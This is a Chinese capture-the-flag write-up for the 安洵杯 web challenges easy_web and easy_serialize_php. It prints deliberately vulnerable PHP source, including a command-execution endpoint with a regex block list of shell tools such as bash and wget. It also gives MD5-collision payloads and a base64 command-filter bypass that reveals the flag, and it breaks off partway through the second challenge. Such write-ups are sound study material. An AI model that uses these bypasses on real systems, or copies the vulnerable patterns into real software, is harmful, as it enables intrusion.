安洵杯 wp+賽后整理

Writeup(賽后整理)

easy_web

img參數(shù)看起來像base64,解密再解密得出一串?dāng)?shù),根據(jù)提示,并不是檢驗(yàn)過的任何md5。進(jìn)行hexdecode,發(fā)現(xiàn)文件名555.png。于是按照相反方式構(gòu)造index.php的加密,進(jìn)行文件包含。

"index.php".b64encode().b64encode().hexencode()
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

MD5碰撞用fastcoll,這里粘貼一個(gè)

tsctf%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A5%BE%A1Ox%C0%16%EC%3D%2A%05%29%C3%0B%EA%B2%D4%C1%D7%AAiT%BA306%7F%8EUH%BA%D9%7E%E3%CB%BC%DEA%97%C1%CB%E3H%19%D5%C9%5E%40%D4%03%7B%90%C6x%ED%92o%5B%F9l%B9%D9%F1%7F%DF%2CJ%E7%BF%C0%28%E3%E5%09%EF%C9%40%EB%10%CB%23%84%7COx%17%23%28%AB%B3%E0f%1B%60H%C6%CFkTX%AF%86%AC4w%FBI%9B%7D%F0%1A%8D%21%ED%28%EFc%97%F6%7D%E4%FC%BF%C7%82-c%A1

tsctf%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A5%BE%A1Ox%C0%16%EC%3D%2A%05%29%C3%0B%EA%B2%D4%C1%D7%2AiT%BA306%7F%8EUH%BA%D9%7E%E3%CB%BC%DEA%97%C1%CB%E3H%19%D5I_%40%D4%03%7B%90%C6x%ED%92o%5B%F9%EC%B9%D9%F1%7F%DF%2CJ%E7%BF%C0%28%E3%E5%09%EF%C9%40%EB%10%CB%23%84%7C%CFx%17%23%28%AB%B3%E0f%1B%60H%C6%CFkTX%AF%86%AC4w%FBI%9B%7Dp%1A%8D%21%ED%28%EFc%97%F6%7D%E4%FC%BFG%82-c%A1

cmd過濾了很多,一個(gè)繞過的方法是base64命令。它接收一個(gè)從stdin讀取的參數(shù)并轉(zhuǎn)化成base64字串。

base64 /flag
SS1TT09OezQwZTNkYTdiNjg4YzRkNWViNzdjOTFlMjRlMGRlYzljfQo=
I-SOON{40e3da7b688c4d5eb77c91e24e0dec9c}

easy_serialize_php

代碼審計(jì)題,源碼如下:

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
} 

根據(jù)提示,在phpinfo中找到屬性:

auto_append_file    d0g3_f1ag.php
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 一、Python簡(jiǎn)介和環(huán)境搭建以及pip的安裝 4課時(shí)實(shí)驗(yàn)課主要內(nèi)容 【Python簡(jiǎn)介】: Python 是一個(gè)...
    _小老虎_閱讀 6,319評(píng)論 0 10
  • 鼓勵(lì)勝過獎(jiǎng)勵(lì)。過多的物質(zhì)獎(jiǎng)勵(lì),只能讓孩子變得浮躁和虛榮,只有讓孩子在自我價(jià)值的實(shí)現(xiàn)中體會(huì)到成功感和喜悅感才能激發(fā)孩...
    心_472c閱讀 71評(píng)論 1 0
  • 交卷的鈴聲還有很久,第一個(gè)人開始交卷了,我內(nèi)心恐慌:“是不是時(shí)間快到了,是不是?!逼鋵?shí)手表就在前邊,但是我已經(jīng)不管...
    寅穎閱讀 453評(píng)論 4 2

友情鏈接更多精彩內(nèi)容